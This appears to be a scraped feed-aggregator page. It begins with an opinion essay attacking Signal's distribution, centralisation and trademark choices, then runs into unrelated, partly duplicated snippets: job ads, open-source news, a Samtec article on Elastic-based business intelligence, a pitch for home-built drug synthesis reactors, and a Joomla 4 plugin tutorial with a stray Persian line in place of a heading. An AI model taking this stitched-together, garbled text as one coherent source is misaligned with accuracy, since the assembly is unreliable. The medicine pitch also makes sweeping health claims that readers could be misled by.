Off the bat, let me explain that I expect a tool which claims to be secure to actually be secure. I don’t view “but that makes it harder for the average person” as an acceptable excuse. If Edward Snowden and Bruce Schneier are going to spout the virtues of the app, I expect it to actually be secure when it matters - when vulnerable people using it to encrypt sensitive communications are targeted by smart and powerful adversaries.

Making promises about security without explaining the tradeoffs you made in order to appeal to the average user is unethical. Tradeoffs are necessary - but self-serving tradeoffs are not, and it’s your responsibility to clearly explain the drawbacks and advantages of the tradeoffs you make. If you make broad and inaccurate statements about your communications product being “secure”, then when the political prisoners who believed you are being tortured and hanged, it’s on you. The stakes are serious. Let me explain why I don’t think Signal takes them seriously.

Google Play

Why do I make a big deal out of Google Play and Google Play Services? Well, some people might trust Google, the company. But up against nation states, it’s no contest - Google has ties to the NSA, has been served secret subpoenas, and is literally the world’s largest machine designed for harvesting and analyzing private information about their users. Here’s what Google Play Services actually is: a rootkit . Google Play Services lets Google do silent background updates on apps on your phone and give them any permission they want. Having Google Play Services on your phone means your phone is not secure.

For the longest time, Signal wouldn’t work without Google Play Services, but Moxie (the founder of Open Whisper Systems and maintainer of Signal) finally fixed this in 2017. There was also a long time when Signal was only available on the Google Play Store. Today, you can download the APK directly from signal.org , but… well, we’ll get to that in a minute.

F-Droid

There’s an alternative to the Play Store for Android. F-Droid is an open source app “store” (repository would be a better term here) which only includes open source apps (which Signal thankfully is). By no means does Signal have to only be distributed through F-Droid - it’s certainly a compelling alternative. This has been proposed, and Moxie has definitively shut the discussion down . Admittedly this is from 2013, but his points and the arguments against them haven’t changed. Let me quote some of his positions and my rebuttals:

No upgrade channel. Timely and automatic updates are perhaps the most effective security feature we could ask for, and not having them would be a real blow for the project.

F-Droid supports updates. If you’re concerned about moving your updates quickly through the (minimal) bureaucracy of F-Droid, you can always run your own repository. Maybe this is a lot of work?I wonder how the workload compares to animated gif search , a very important feature for security concious users. I bet that 50 million dollar donation could help, given how many people operate F-Droid repositories on a budget of $0.

No app scanning. The nice thing about market is the server-side APK scanning and signature validation they do. If you start distributing APKs around the internet, it’s a reversion back to the PC security model and all of the malware problems that came with it.

Try searching the Google Play Store for “flashlight” and look at the permissions of the top 5 apps that come up. All of them are harvesting and selling the personal information of their users to advertisers. Is this some kind of joke? F-Droid is a curated repository, like linux distributions. Google Play is a malware distributor. Packages on F-Droid are reviewed by a human being and are cryptographically signed . If you run your own F-Droid repo this is even less of a concern.

I’m not going to address all of Moxie’s points here, because there’s a deeper problem to consider. I’ll get into more detail shortly. You can read the 6-year-old threads tearing Moxie’s arguments apart over and over again until GitHub added the feature to lock threads, if you want to see a more in-depth rebuttal.

The APK direct download

Last year Moxie added an official APK download to signal.org. He said this was up for “ harm reduction ”, to avoid people using unofficial builds they find around the net. The download page is covered in warnings telling you that it’s for advanced users only, it’s insecure, would you please go to the Google Play store you stupid user. I wonder, has Moxie considered communicating to people the risks of using the Google Play version?

The APK direct download doesn’t even accomplish the stated goal of “harm reduction”. The user has to manually verify the checksum, and figure out how to do it on a phone, no less. A checksum isn’t a signature, by the way - if your government- or workplace- or abusive-spouse-installed certificate authority gets in the way they can replace the APK and its checksum with whatever they want. The app has to update itself, using a similarly insecure mechanism. F-Droid handles updates and actually signs their packages. This is a no brainer, Moxie, why haven’t you put Signal on F-Droid yet?

Why is Signal like this?

So if you don’t like all of this, if you don’t like how Moxie approaches these issues, if you want to use something else, what do you do?

Moxie knows about everything I’ve said in this article. He’s a very smart guy and I am under no illusions that he doesn’t understand everything I’ve put forth. I don’t think that Moxie makes these choices because he thinks they’re the right thing to do. He makes arguments which don’t hold up, derails threads, leans on logical fallacies, and loops back around to long-debunked positions when he runs out of ideas. I think this is deliberate. An open source software team reads this article as a list of things they can improve on and gets started. Moxie reads this and prepares for war. Moxie can’t come out and say it openly, but he’s made the decisions he has made because they serve his own interests.

Lots of organizations which are pretending they don’t make self-serving decisions at their customer’s expense rely on argumentative strategies like Moxie does. If you can put together an argument which on the surface appears reasonable, but requires in-depth discussion to debunk, passerby will be reassured that your position is correct, and that the dissenters are just trolls. They won’t have time to read the lengthy discussion which demonstrates that your conclusions wrong, especially if you draw the discussion out like Moxie does. It can be hard to distinguish these from genuine positions held by the person you’re talking to, but when it conveniently allows them to make self-serving plays, it’s a big red flag.

This is a strong accusation, I know. The thing which convinced me of its truth is Signal’s centralized design and hostile attitude towards forks. In open source, when a project is making decisions and running things in a way you don’t like, you can always fork the project. This is one of the fundamental rights granted to you by open source. It has a side effect Moxie doesn’t want, however. It reduces his power over the project. Moxie has a clever solution to this: centralized servers and trademarks.

Trust, federation, and peer-to-peer chat

Truly secure systems do not require you to trust the service provider. This is the point of end-to-end encryption. But we have to trust that Moxie is running the server software he says he is. We have to trust that he isn’t writing down a list of people we’ve talked to, when, and how often. We have to trust not only that Moxie is trustworthy, but given that Open Whisper Systems is based in San Francisco we have to trust that he hasn’t received a national security letter, too (by the way, Signal doesn’t have a warrant canary). Moxie can tell us he doesn’t store these things, but he could. Truly secure systems don’t require trust .

There are a couple of ways to solve this problem, which can be used in tandem. We can stop Signal from knowing when we’re talking to each other by using peer-to-peer chats. This has some significant drawbacks, namely that both users have to be online at the same time for their messages to be delivered to each other. You can still fall back to peer-to-server-to-peer when one peer is offline, however. But this isn’t the most important of the two solutions.

The most important change is federation. Federated services are like email, in that Alice can send an email from gmail.com to Bob’s yahoo.com address. I should be able to stand up a Signal server, on my own hardware where I am in control of the logs, and communicate freely with other Signal servers, including Open Whisper’s servers. This distributes the security risks across hundreds of operators in many countries with various data extradition laws. This turns what would today be easy for the United States government to break and makes it much, much more difficult. Federation would also open the possibility for bridging the gap with several other open source secure chat platforms to all talk on the same federated network - which would spurn competition and be a great move for users of all chat platforms.

Moxie forbids you from distributing branded builds of the Signal app, and if you rebrand he forbids you from using the official Open Whisper servers. Because his servers don’t federate, that means that users of Signal forks cannot talk to Signal users . This is a truly genius move. No fork of Signalto date has ever gained any traction, and never will, because you can’t talk to any Signal users with them. In fact, there are no third-party applications which can interact with Signal users in any way. Moxie can write as many blog posts which appeal to wispy ideals and “moving ecosystems” as he wants, but those are all really convenient excuses for an argument which allows him to design systems which serve his own interests.

No doubt these are non-trivial problems to solve. But I have personally been involved in open source projects which have collectively solved similarly difficult problems a thousand times over with a combined budget on the order of tens of thousands of dollars.

What were you going to do with that 50 million dollars again?

P.S. If you’re looking for good alternatives to Signal, I can recommend Matrix .


          EPISODE60 - Intro to Cloud Foundry      Cache   Translate Page   Web Page Cache   
Learn about the open source Cloud Foundry project that is now a central part of the HP Helion portfolio from the VP of Engineering responsible for the HP Helion Development Platform.
          EPISODE70 - CloudSland Introduction      Cache   Translate Page   Web Page Cache   
Learn about the new open source project; CloudSlang from the HP team in Israel for DevOps automation.
          Guy Martin: Open Source Strategy at Autodesk      Cache   Translate Page   Web Page Cache   

Companies today can't get away with not using open source, says Guy Martin, Director, Open@Autodesk, who recently sat down with us for a deep dive into Autodesk's engagement with and contributions to the open source community.

"Like any company...we consume a lot of open source," said Martin, "I was brought in to help Autodesk's open source strategy in terms of how we contribute back more effectively to open source, how we open source code within our environment, which we want to be a standard — code which is non-differentiating and not strategic IP."


           TTJ Wallet (Lifestyle)      Cache   Translate Page   Web Page Cache   

TTJ Wallet 1.0.0


Device: iOS Universal
Category: Lifestyle
Price: Free, Version: 1.0.0 (iTunes)

Description:

TTJ Wallet

With this wallet, users can hold or share "SEN Coin" and "Sen Point".
"SEN Coin" and "Sen Point" are digital asset based on Stellar network issued by Truong Thanh Japan.

TTJ Wallet is free and open source software.
Anyone can review TTJ Wallet's source code on GitHub (https://github.com/ttvnp/ttj-asset-ios-client).

TTJ Wallet


          Alexa : Amazon publie un kit de développement pour intégrer son assistant dans les voitures      Cache   Translate Page   Web Page Cache   
Baptisé Auto SDK, le kit open source va permettre aux constructeurs automobiles et aux équipementiers d’intégrer l’assistant vocal du géant du e-commerce dans leur modèles.
          LXer: How To Install Git on Debian 9      Cache   Translate Page   Web Page Cache   
Published at LXer: This tutorial will show you how to install and configure Git on Debian 9.Git is the world's most popular distributed version control system, used by many open source and...
          Alexa : Amazon publie un kit de développement pour intégrer son assistant dans les voitures      Cache   Translate Page   Web Page Cache   
Baptisé Auto SDK, le kit open source va permettre aux constructeurs automobiles et aux équipementiers d’intégrer l’assistant vocal du géant du e-commerce dans leur modèles.
          Java Developer - IAM - Codeworks - Milwaukee, WI      Cache   Translate Page   Web Page Cache   
Experience in J2EE web application development and ability to use open source libraries. Our direct client is seeking a Java Developer with experience in...
From Indeed - Thu, 02 Aug 2018 16:23:50 GMT - View all Milwaukee, WI jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Java Backend Developer - C4J - Herentals      Cache   Translate Page   Web Page Cache   
Ben jij het meesterbrein achter eenvoudige oplossingen voor complexe problemen? Voldoen deze zowel aan de eisen van de klant als die van gebruiker? Werk je graag in een grootschalige, open source omgeving? Ben je een goeroe voor Junior developers? Welkom! Als back-end developer werk je met Java, Spring, Hibernate, Jersey, Jackson, Apache CXF, ... om oude back-end services te innoveren en nieuwe te implementeren. Een doos heeft voor jou geen wanden, enkel een opening om eruit te springen:...
          Dot Net Training in Bhubaneswar, Dot Net Training Center in Bhubaneswar, Best Dot Net Course in Bhubaneswar. dot net course in Bhubaneswar      Cache   Translate Page   Web Page Cache   
Dot Net is an open source technology which is a software framework and has been developed by the best software company in the world i.e. Microsoft. dot net institute in Bhubaneswar, dot net course in Bhubaneswar, best dot net training in Bhubaneswar, Odisha.
          Juveniles From New Import Le Grand: Proclaimed as the Billion Dollar Chicken, first time in U.S. - USD 100.00      Cache   Translate Page   Web Page Cache   
Le Grand is known as the billion dollar chicken, we expect it to level the industrial playing field on behalf of the small farmer. From a distance, this stunning bird is easily mistaken for a Black Copper Marans.  A closer look reveals that the Le Grand has been selected for a much heavier frame as well as yellow skin and shanks. Our lines are direct imports from British Columbia and approved by the originator of this open source meat bird.  Le Grand is built for pastoral meat production, but they are also excellent layers of brown eggs and occasional chocolate egg due to the heritage French genetics. These birds breed true and conform closely to Marans, in appearance only.  We regularly hatch very vigorous chicks that typically reach 200 grams in their first week. They will go on to reach 5-6 pounds + by 12-14 weeks. Le Grand chickens have garnered twice the amount of positive feedback regarding taste and texture than our La Bresse chickens, making them the newest contender for the coveted title of North America’s best tasting chicken.  Until now you’ve only been able to get a hybrid version of Cornish cross or freedom ranger
          Open Source Summit Japan 2018開幕 Jim Zemlinの講演に続きAGLやHyperledgerの事例を発表      Cache   Translate Page   Web Page Cache   
The Linux Foundation主催の技術カンファレンス「Open Source Summit Japan 2018」が、6月20日〜22日に開催された。併催はAutomotive Linux Summit Japan 2018。数年前までは「LinuxCon Japan」の名前で開催されていたカンファレンスだが、イベントおよびThe Linux Foundationのカバー範囲がクラウドやブロックチェーンなど周辺に広がったことにともない現在の名称で毎年開催されている。 20日午前のキーノートは、The Linux FoundationのExecutive DirectorであるJim Zemlin氏の講演から始まった。ここでは、20日午前のキーノートの前半をレポートする。
          2009-02-02      Cache   Translate Page   Web Page Cache   
iPhone Flash, new Kendle, Google Gears, open source better security
          From Tableau to Elastic: How Samtec Streamlined Business Intelligence & Analytics      Cache   Translate Page   Web Page Cache   

Let’s get this out of the way: we’re not the typical Elastic users. While most use Elasticsearch for logging, security, or search; we use Kibana and Elasticsearch for business intelligence across our enterprise from sales to manufacturing. Also, we have applications using Elasticsearch as a primary data store, and our “production” cluster is often running pre-releases to take advantage of the newest functionality. That being so, our origin with Elastic is likely the same as yours — it all started with needing a place to dump a whole bunch of logs.

Samtec builds electrical interconnects found in products ranging from medical devices, servers to self-driving cars. Our group — Smart Platform Group — was born from an area of Samtec that builds high-speed copper and optical interconnects. Samtec’s FireFly™ family of interconnects are a great example. They have 192 Gbps of bandwidth packed onto a device the size of a dime.

samtec_1.png

The process to manufacture Firefly™ requires hundreds of steps. Almost every step gets performed by equipment that produces logs containing volumes of data. For example, one step of the process is to place silicon die onto a printed circuit board. The placement gets measured in microns (1/1000th of a millimeter), and the machine that does the placement holds onto each die with a small amount of vacuum pressure. That pressure gets logged for every placement. Those logs look something like this:

"die_count_x" => "integer"
"die_count_y" => "integer"
"commanded_pick_force" => "float"
"actual_pick_force" => "float"
"commanded_place_force" => "float"
"actual_place_force" => "float

We needed to start with capturing the data that would be lost over time as the machines rotated their logs. Logstash, and by extension Elasticsearch, were determined to be the quickest and most cost-effective solution, requiring the least development and maintenance effort. So we wrote some Logstash configs and started dumping data into Elasticsearch. It may not have been pretty, but it worked and we more-or-less forgot about it. That was late 2015.

Three months went by, then six, then a year — and the data was never touched. Finally, one fateful day a customer request came in with an early device failure “in the field”. We needed to look back to when that customer’s order was running on a specific machine to see if everything looked normal in the production process.

Cue our first Kibana visualization, a simple line chart showing the force used to pick up that small silico die. We knew the build date of the device, so we filtered our chart by date and got something similar to the below.

samtec_2.jpg

Each dip in the top line represents a period where the force seems to have dropped suspiciously low. Naturally, we had lots of questions, but the most pressing was: did the device in question get built during one of those periodic dips? The exact times each order and piece got ran was stored in our SQL database, and we needed to bring the two pieces of data together. Each machine had a vastly different data structure, and the logistics of moving them all into SQL seemed problematic. However, moving tabular SQL data into Elasticsearch was a well-documented path with Logstash. So we wrote another Logstash config to bring in the SQL data and leveraged some Kibana-fu to overlay orders and serial numbers onto some time series charts.

samtec_3.jpg

Given the above, it looked like there were a couple of transactions that occurred during a time of “low pick force”. We were going to have to review those in more depth.

What started as one or two Logstash configs was threatening to turn into hundreds as the number of data sources we wanted to pull into Elasticsearch grew. Rather than continue to spend developer time creating Logstash configs, a product idea was born focused on making Elasticsearch data imports more accessible. Moreover, we wanted to enable self-service Business Intelligence using the Elastic Stack.

Enter Conveyor

Conveyor is an open source plugin that we wrote with data analysts and business users in mind. We wanted a graphical, interactive way for loading data into Elasticsearch. We wanted it to be easily extended to support different data sources, and we wanted it to integrate well into the Elastic Stack.

samtec_4.jpg

So now that any data is just a few buttons away from being in Elastic, what kind of possibilities are within an easy reach?

We’ve replaced our Tableau Dashboards with Kibana ones. In this case a heads-up display for showing order status in a manufacturing center. Auto-refresh meant the display showed new orders near real-time.

samtec_5_6_2.png#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

We’ve used Conveyor to pull in bill of materials and inventory data. We put it all in to Graph to quickly trace suspect lots through manufacturing and to identify other affected lots. In this case, we were able to easily determine customer orders (green circles) that consumed a suspect lot (red circle) even though there was a sub-assembly process that occurred midstream (pink circles).

samtec_7.jpg

We’ve also used Conveyor to pull in process control data and analyzed it for anomalies using Elastic machine learning. In this case, we analyze a metric that gauges the health of a test station — and we can easily identify or be alerted when it isn’t as expected.

samtec_8.jpg

Finally, we use Conveyor and Kibana together to build powerful dashboards on all sorts of business metrics, like GitHub Repository Statistics, for our open source chatbot platform called Articulate to cheer-on the increasing downloads and stars!

samtec_9.jpg

What’s Next

We’ve now been using Elasticsearch as a primary data store for our projects for more than four years and though we don’t have big data like some users of Elastic we have broad data. With the introduction of Conveyor, as well as new Kibana functionality like Canvas and Vega visualizations, we strongly believe that the Elastic Stack is the best open source business intelligence platform. To reinforce that we’ll leave you with three thoughts:

  • Joining disparate data sources in a single analytical tool is extremely powerful and compounds the value of your data.
  • Dynamic mappings and re-index capabilities make Elasticsearch an excellent collect now, analyze later data store.
  • Cross-index search enables powerful information gathering on business data. (Want all sales orders, shipments, and contacts for a customer? Just search for their name across multiple indices).

We hope to be back to share more in-depth walkthroughs on using Conveyor with Vega and Canvas, as well as our experience with the new Elastic User Interface (EUI) library. We’re happy to share our experiences so keep an eye out for those here or on our site at https://blog.spg.ai. Also, be sure to check out Conveyor


Caleb Keller, Woo Ee, and Mike Lutz head a team of data lovers, tinkerers, and technology enthusiasts building open-source solutions for Samtec's Smart Platform Group


          Silvano Mello: Dose of hope      Cache   Translate Page   Web Page Cache   
https://www.aneddoticamagazine.com/wp-content/uploads/Silvano-Mello-Dose-of-hope.jpg

Related Post














Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/silvano-mello-dose-of-hope/
          OpenDrop V3 Digital Microfluidics Platform      Cache   Translate Page   Web Page Cache   
https://www.aneddoticamagazine.com/wp-content/uploads/maxresdefault-274.jpg

OpenDrop is an open source digital microfluidics platform. Reservoirs allow to supply the chip with liquids and separate drops of same size. OpenDrop is a developement as part of the Digital Biology Ecosystem.


OpenDrop Digital Microfluidic Platform: http://www.gaudi.ch/OpenDrop


 



A new computer software written in Processing language allows the easy design and control of patterns and protocols on the device.


Related Post














Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/opendrop-v3-digital-microfluidics-platform/
          Four Thieves Vinegar: Make your own medicine      Cache   Translate Page   Web Page Cache   
https://www.aneddoticamagazine.com/wp-content/uploads/Four-Thieves-Vinegar.jpeg

 


Free Medicine for Everyone.


People are disenfranchised from access to medicine for various reasons. To circumvent these, we have developed a way for individuals to manufacture their own medications. We have designed an open-source automated lab reactor, which can be built with off-the-shelf parts, and can be set to synthesize different medications. This will save hundreds of thousands of lives.


The main reasons for people being disenfranchised from medicines are: price, legality, and lack of infrastructure. Medicines like Solvadi which costs $80,000 for a course of treatment, is beyond the reach of most people. Mifepristone and Misoprostal are unavailable in many places where abortion is illegal. Antiretroviral HIV treatments even when provided free, have no way of getting to remote locations in 3rd world countries.


The design will be published online, along with synthesis programs. The system will also have a forum system for users to communicate and contribute to the development of the system. With time, the system will become self-sustaining, much like other open source movements.


https://fourthievesvinegar.org




 


Related Post














Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/four-thieves-vinegar-make-your-own-medicine/
          Four Thieves Vinegar: Make your own medicine      Cache   Translate Page   Web Page Cache   
https://www.aneddoticamagazine.com/wp-content/uploads/Four-Thieves-Vinegar.jpeg

 


Free Medicine for Everyone.


People are disenfranchised from access to medicine for various reasons. To circumvent these, we have developed a way for individuals to manufacture their own medications. We have designed an open-source automated lab reactor, which can be built with off-the-shelf parts, and can be set to synthesize different medications. This will save hundreds of thousands of lives.


The main reasons for people being disenfranchised from medicines are: price, legality, and lack of infrastructure. Medicines like Solvadi which costs $80,000 for a course of treatment, is beyond the reach of most people. Mifepristone and Misoprostal are unavailable in many places where abortion is illegal. Antiretroviral HIV treatments even when provided free, have no way of getting to remote locations in 3rd world countries.


The design will be published online, along with synthesis programs. The system will also have a forum system for users to communicate and contribute to the development of the system. With time, the system will become self-sustaining, much like other open source movements.


https://fourthievesvinegar.org




 


Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/four-thieves-vinegar-make-your-own-medicine/
          OpenDrop V3 Digital Microfluidics Platform      Cache   Translate Page   Web Page Cache   
https://www.aneddoticamagazine.com/wp-content/uploads/maxresdefault-274.jpg

OpenDrop is an open source digital microfluidics platform. Reservoirs allow to supply the chip with liquids and separate drops of same size. OpenDrop is a developement as part of the Digital Biology Ecosystem.


OpenDrop Digital Microfluidic Platform: http://www.gaudi.ch/OpenDrop


 



A new computer software written in Processing language allows the easy design and control of patterns and protocols on the device.


Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/opendrop-v3-digital-microfluidics-platform/
          PostgreSQL 10.5      Cache   Translate Page   Web Page Cache   
PostgreSQL is a powerful, open source object-relational database system. It has more than 15 years of active development and a proven architecture that has earned it a strong reputation for reliability, data integrity, and correctness. It is fully A...
          Facebook Script | Social Network Script - Chennai, India      Cache   Translate Page   Web Page Cache   
Simple Facebook Script with new professional look, highly advanced options, and customization with open source php platform to use the site more reliable and robustness for the users, choose our script, this script is not only used as the Social Networ...
          Social Mapper: This Open Source Tool Lets “Good” Hackers Track People On Social Media      Cache   Translate Page   Web Page Cache   

There are tons of automated tools and services that any shady hacker can employ to grab the public data on Facebook, Twitter, Google, or Instagram, and use it for notorious purposes. But what about the ethical hackers and security researchers who are looking for a means to achieve the same? To tackle this issue, security […]

The post Social Mapper: This Open Source Tool Lets “Good” Hackers Track People On Social Media appeared first on Fossbytes.


          The Soviet Symphonist      Cache   Translate Page   Web Page Cache   

The Shostakovich story — man and music in the apocalypse of world war and Cold War — seems to get more frightfully irresistible with every remembrance, every new CD in the Boston Symphony’s Grammy winning ...

The post The Soviet Symphonist appeared first on Open Source with Christopher Lydon.


          Strawberry: Quality sound, open source music player      Cache   Translate Page   Web Page Cache   
video editing dashboard

I recently received an email from Jonas Kvinge who forked the Clementine open source music player. Jonas writes:


read more
          Google Boots Open Source Anti-Censorship Tool From Chrome Store      Cache   Translate Page   Web Page Cache   

A browser extension that acted as an anti-censorship tool for 185,000 people has been kicked out of the Chrome store by Google. The open source Ahoy! tool facilitated access to more than 1,700 blocked sites but is now under threat. Despite several requests, Google has provided no reason for its decision.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.


          UX Developer Lead, Themes - Shopify - Montréal, QC      Cache   Translate Page   Web Page Cache   
We champion Slate, an open source development tool, and work with our colleagues across the Online store channel to shape the development of new platform...
From Shopify - Tue, 10 Jul 2018 20:00:27 GMT - View all Montréal, QC jobs
          Full Stack Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Mon, 06 Aug 2018 23:18:47 GMT - View all Seattle, WA jobs
          Senior Front End Engineer, Intelligent Operating Network - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Fri, 20 Jul 2018 23:17:40 GMT - View all Seattle, WA jobs
          Senior Back End Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Mon, 16 Jul 2018 05:18:50 GMT - View all Seattle, WA jobs
          Back End Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Tue, 12 Jun 2018 23:18:07 GMT - View all Seattle, WA jobs
          Software Engineering Manager, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Thu, 31 May 2018 23:18:10 GMT - View all Seattle, WA jobs
          Senior Full Stack Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Thu, 24 May 2018 23:18:05 GMT - View all Seattle, WA jobs
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Audacious 3.10.0      Cache   Translate Page   Web Page Cache   
Audacious is an open source audio player. A descendant of XMMS, Audacious plays your music how you want it, without using much CPU resource.
          J4.x:Creating a Plugin for Joomla/fa      Cache   Translate Page   Web Page Cache   

Created page with "استفاده از پلاگین ها در کد های شما"

New page

<noinclude><languages /></noinclude>
{{Top portal heading|color=white-bkgd|icon=magic|icon-color=#5091cd|size=3x|text-color=#333|title=Tutorial<br />
How to create a Plugin for Joomla 4}}
<noinclude>{{Joomla version|version=4.x|comment=series}}</noinclude>
{{-}}
The plugin structure for Joomla! 1.5, 2.5 and 3.x was very flexible and powerful. Not only can plugins be used to handle events triggered by the core application and extensions, but plugins can also be used to make third party extensions extensible and powerful. In Joomla 4.x we have rewritten a lot of the dispatcher system behind this to increase the flexibility further when you modify the parameters passed as events whilst simultaneously increasing the performance of plugins.

This How-To should provide you with the basics of what you need to know to develop your own plugin. Most plugins consist of just a single code file but to correctly install the plugin code it must be packaged into an installation file which can be processed by the Joomla installer.

=== Creating the Installation File ===
As with all extensions in Joomla, plugins are easily installed as a .zip file (.tar.gz is also supported) but a correctly formatted XML file must be included. <br />
As an example, here is the XML installation file for the categories search plugin:

<source lang="xml">
<?xml version="1.0" encoding="utf-8"?>
<extension version="3.1" type="plugin" group="search" method="upgrade">
<name>plg_search_categories</name>
<author>Joomla! Project</author>
<creationDate>November 2005</creationDate>
<copyright>Copyright (C) 2005 - 2018 Open Source Matters. All rights reserved.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_SEARCH_CATEGORIES_XML_DESCRIPTION</description>
<files>
<filename plugin="categories">categories.php</filename>
</files>
<languages>
<language tag="en-GB">en-GB.plg_search_categories.ini</language>
<language tag="en-GB">en-GB.plg_search_categories.sys.ini</language>
</languages>
<config>
<fields name="params">

<fieldset name="basic">
<field
name="search_limit"
type="number"
label="JFIELD_PLG_SEARCH_SEARCHLIMIT_LABEL"
default="50"
/>

<field
name="search_content"
type="radio"
class="switcher"
label="JFIELD_PLG_SEARCH_ALL_LABEL"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>

<field
name="search_archived"
type="radio"
class="switcher"
label="JFIELD_PLG_SEARCH_ARCHIVED_LABEL"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>

</fields>
</config>
</extension>
</source>

As you can see, the system is similar to other Joomla XML installation files. You only have to look out for the <tt>group="xxx"</tt> entry in the <tt><extension></tt> tag and the extended information in the <tt><filename></tt> tag. This information tells Joomla into which folder to copy the file and to which group the plugin should be added.

If you are creating a plugin that responds to existing core events, the <tt>group="xxx"</tt> attribute would be changed to reflect the name of existing plugin folder for the event type you wish to augment. e.g. <tt>group="authentication"</tt> or <tt>group="user"</tt>. See [[S:MyLanguage/Plugin/Events|Plugin/Events]] for a complete list of existing core event categories. In creating a new plugin to respond to core events it is important that your plugin's name is unique and does not conflict with any of the other plugins that may also be responding to the core event you wish to service as well.

If you are creating a plugin to respond to non-core system events your choice for the <tt>group="xxx"</tt> tag should be different than any of the existing core categories.

'''TIP:''' ''If you add the attribute <tt>method="upgrade"</tt> to the tag <tt>extension</tt>, this plugin can be installed without uninstalling an earlier version. All existing files will be overwritten, but old files will not be deleted.''

=== Creating the Plugin ===
The object-oriented way of writing plugins involves writing a subclass of [https://api.joomla.org/cms-4/classes/Joomla.CMS.Plugin.CMSPlugin.html CMSPlugin], a base class that implements the basic properties of plugins. In your methods, the following properties are available:

* <tt>$this->params</tt>: the [[S:MyLanguage/Parameter|parameters]] set for this plugin by the administrator
* <tt>$this->_name</tt>: the name of the plugin
* <tt>$this->_type</tt>: the group (type) of the plugin
* <tt>$this->db</tt>: the db object
* <tt>$this->app</tt>: the application object

'''TIP:''' ''To use <tt>$this->db</tt> and <tt>$this->app</tt>, <tt>CMSPlugin</tt> tests if the property exists and is not private. If it is desired for the default objects to be used, create un-instantiated properties in the plugin class (i.e. <tt>protected $db; protected $app;</tt> in the same area as <tt>protected $autoloadLanguage = true;</tt>). The properties will not exist unless explicitly created.''

In the following code example, <tt><PluginGroup></tt> represents the group (type) of the plugin, and <tt><PluginName></tt> represents its name. Note that class and function names in PHP are case-insensitive.

We also implement the [https://api.joomla.org/framework-2/classes/Joomla.Event.SubscriberInterface.html SubscriberInterface] here which is the major change from Joomla 1.5-3.x. Instead of the function name automatically being detected and being the same as the event name this allows you to have custom function names. This allows us to tell what plugins are implementing what functions and as parsing public methods in PHP code is slow gives a significant performance boost.

Note throughout the Joomla 4 series there is a deprecated layer that will cover plugins using the old naming strategy of plugin names being the same as the event name when SubscriberInterface is not implemented.

<source lang="php">
<?php
// no direct access
defined( '_JEXEC' ) or die;

use Joomla\CMS\Plugin\CMSPlugin;
use Joomla\CMS\Event\Event;
use Joomla\Event\SubscriberInterface;

class Plg<PluginGroup><PluginName> extends CMSPlugin implements SubscriberInterface
{
/**
* Load the language file on instantiation
*
* @var boolean
* @since 3.1
*/
protected $autoloadLanguage = true;

/**
* Returns an array of events this subscriber will listen to.
*
* @return array
*/
public static function getSubscribedEvents(): array
{
return [
'<EventName>' => 'myFunctionName',
];
}

/**
* Plugin method is the array value in the getSubscribedEvents method
* The plugin then modifies the Event object (if it's not immutable)
*/
public function myFunctionName(Event $event)
{
/*
* Plugin code goes here.
* You can access parameters via $this->params
*/
return true;
}
}
?>
</source>

استفاده از پلاگین ها در کد های شما
If you are creating a plugin for a new, non-core event, remember to activate your plugin after you install it. Precede any reference to your new plugin with the <tt>JPluginHelper::importPlugin()</tt> command.

Now that you've created your plugin, you will probably want to call it in your code. You might not: the Joomla core has a number of built-in events that you might want your plugin code to be registered to (and in that case you can ignore this section).

==== New Joomla 4 Way ====
The new way of doing this in Joomla 4 is to get the dispatcher and dispatch a named event.

<source lang="php">
use Joomla\CMS\Event\AbstractEvent;
use Joomla\CMS\Factory;

$dispatcher = Factory::getApplication()->getDispatcher();

// Here we create an event however as long as you implement EventInterface you can create your own
// custom classes
$event = AbstractEvent::create(
'<EventName>',
[
'name' => $value,
]
);

$eventResult = $dispatcher->dispatch('<EventName>', $event);
</source>

